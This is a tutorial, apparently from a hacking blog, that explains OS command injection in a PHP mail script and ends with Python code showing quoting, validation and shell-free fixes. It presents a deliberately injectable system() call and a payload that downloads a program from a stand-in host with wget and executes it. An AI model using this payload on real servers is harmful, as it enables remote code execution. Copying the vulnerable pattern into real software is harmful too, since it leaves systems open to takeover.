I have previously explained how to use SQL injection and XPath injection to hack websites. Today I will teach you another injection technique which, if executed properly, can give you complete ownership of the victim's website: Command Injection. When user input is used as part of a system command, an attacker can inject additional system commands through that input.
Let’s break this down:
What is Command Injection?
Command injection is an attack in which we supply shell commands through an input the application does not validate, such as a form field, so that the server-side code ends up running them as part of a system command it builds dynamically. We can exploit that to gain unauthorized access to data or network resources. The injected commands are executed by the web server itself, not by visitors' browsers: the vulnerable application behaves like a pseudo system shell, and the attacker can use it as the system user the application runs as. Commands execute with exactly the privileges and environment of the application, no more and no less. Command injection is possible in most cases because of missing or incorrect validation of attacker-controlled input (form fields, cookies, HTTP headers, etc.).
This can happen in any programming language, but it is very common in Perl, PHP, and shell-based CGI scripts, and less common in Java, Python, and C.
Let’s use some examples
Consider the PHP code below:
<?php
$email_subject = "Welcome to HackingLoops";
if (isset($_GET['email'])) {
    // Vulnerable: the email parameter is concatenated straight into the shell command line.
    system("mail " . $_GET['email'] . " -s '" . $email_subject . "' < /tmp/email_body", $return_val);
}
?>
The above code is an example where the user sends his or her email address in the email parameter, and that input is placed directly into the system command. Now, as with SQL injection or XPath injection, our goal is to inject a shell command into the email parameter while keeping the command before and after the parameter syntactically correct; otherwise the injection will not execute.
Think of the system() call as a small jigsaw puzzle where we arrange the pieces to form a single image. All the parts except one are in place, and we have to find the middle piece to finish the puzzle. This is easy with puzzle pieces but a little tricky in command injection. Our objective is shown below:
mail [missing puzzle part] -s 'Welcome to HackingLoops' < /tmp/email_body
Note: for the missing puzzle piece we need to ensure that the mail command still runs and exits cleanly. The focus here is on syntax: the final command line must be syntactically correct.
For example, mail --help will run and exit properly. We can then add further shell commands by separating them with a semicolon (;).
We can also neutralize the rest of the original command by putting the shell comment symbol (#) in front of it, so the shell ignores everything that follows. The missing puzzle piece therefore becomes:
--help; wget http://somehackersite.com/attack_program; ./attack_program #
Adding the missing piece to the original shell command produces:
mail --help; wget http://somehackersite.com/attack_program; ./attack_program # -s 'Welcome to HackingLoops' < /tmp/email_body
Because the shell ignores everything after the #, this is equivalent to:
mail --help; wget http://somehackersite.com/attack_program; ./attack_program
The shell will run mail --help, then download the attack program from somehackersite.com and execute it on the victim server, letting the attacker run arbitrary commands on the vulnerable website. Those commands run with the privileges of the web server process, which is usually enough to read the site's source code and configuration files and to use the server as a foothold for further attacks.
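To make the puzzle-piece reasoning concrete, here is an added example (my own code, not part of the original article) that rebuilds the article's mail command in Python and uses the standard library's shlex to show how /bin/sh would split the result into separate commands. It reproduces the vulnerable concatenation, then the two fixes a practitioner would apply: quoting the parameter with shlex.quote (the Python counterpart of PHP's escapeshellarg) so it stays a single shell word, and rejecting anything that is not an email address before it reaches the command at all. The subject and body file come from the PHP snippet, the payload from the text above; the email regex and the function names are assumptions for this example.

```python
import re
import shlex

# Values taken from the article's PHP snippet.
SUBJECT = "Welcome to HackingLoops"
BODY_FILE = "/tmp/email_body"
# The article's payload for the email parameter (constructed from the text above).
PAYLOAD = "--help; wget http://somehackersite.com/attack_program; ./attack_program #"

# Allowlist for what the parameter is supposed to be. Assumed for this example;
# a real application would use its own, possibly stricter, validation.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def vulnerable_command(email):
    """Mirror of the PHP system() call: the parameter is concatenated raw."""
    return f"mail {email} -s '{SUBJECT}' < {BODY_FILE}"


def quoted_command(email):
    """Same command, but every variable part goes through shlex.quote(), the
    Python equivalent of PHP's escapeshellarg(): the parameter becomes exactly
    one shell word no matter which metacharacters it contains."""
    return f"mail {shlex.quote(email)} -s {shlex.quote(SUBJECT)} < {shlex.quote(BODY_FILE)}"


def is_valid_email(email):
    """True only for strings that look like a single email address."""
    return EMAIL_RE.fullmatch(email) is not None


def hardened_command(email):
    """Validate first (reject anything that is not an address), then quote.
    Quoting alone defeats the injection; the allowlist also keeps odd but
    harmless values such as a leading '-' option from reaching mail."""
    if not is_valid_email(email):
        raise ValueError(f"rejected email parameter: {email!r}")
    return quoted_command(email)


def shell_view(command):
    """Approximate how /bin/sh splits a command line into simple commands.
    Returns a list of argv lists. shlex with punctuation_chars=True makes
    ; & | ( ) < > their own tokens, and the default commenters='#' drops
    everything after an unquoted '#'. (shlex also treats a '#' glued to a
    word as a comment, which sh does not; the payload here puts it after
    whitespace, so both views agree.)"""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for token in lexer:
        if token in (";", "&", "&&", "|", "||"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


if __name__ == "__main__":
    print("vulnerable:", shell_view(vulnerable_command(PAYLOAD)))
    print("quoted    :", shell_view(quoted_command(PAYLOAD)))
    print("hardened  :", shell_view(hardened_command("alice@example.com")))
    try:
        hardened_command(PAYLOAD)
    except ValueError as exc:
        print("hardened  :", exc)
```

Run stand-alone, the vulnerable view shows three separate commands (mail --help, wget, ./attack_program) while the quoted view shows a single mail invocation whose second argument is the whole payload as one literal string. Quoting is the fallback; the stronger fix is to not involve a shell at all, for example by passing an argv array to PHP's proc_open or Python's subprocess.run, or by using a mail library instead of shelling out.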